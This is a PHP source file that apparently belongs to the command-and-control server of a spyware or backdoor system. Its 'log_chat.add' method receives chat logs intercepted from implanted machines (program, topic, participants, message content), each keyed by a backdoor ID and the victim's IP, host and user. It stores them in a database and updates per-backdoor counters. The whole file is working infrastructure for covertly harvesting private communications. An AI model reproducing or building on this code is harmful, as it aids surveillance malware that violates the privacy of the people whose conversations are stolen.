<?php

//////////
///
///   log_chat.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_chat.add'] = array('func'   => 'log_chat_add',
                            'perm'   => AL_SERV,
                            'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_chat_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= program
   // varchar2  <= topic
   // varchar3  <= users
   // varchar4  <= -
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= content
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`varchar3`, ";
   $sql .=                    "`longtext1`) ";
   $sql .= "VALUES ('$backdoor_id', 'CHAT', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $log['program']),
                      array('t' => 's', 'v' => $log['topic']),
                      array('t' => 's', 'v' => $log['users']),
                      array('t' => 's', 'v' => $log['content']));

      $ret = db_execute($stmt, $params);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `chat` = `chat` + 1, ";
      $sql .=     "`chat_new` = `chat_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
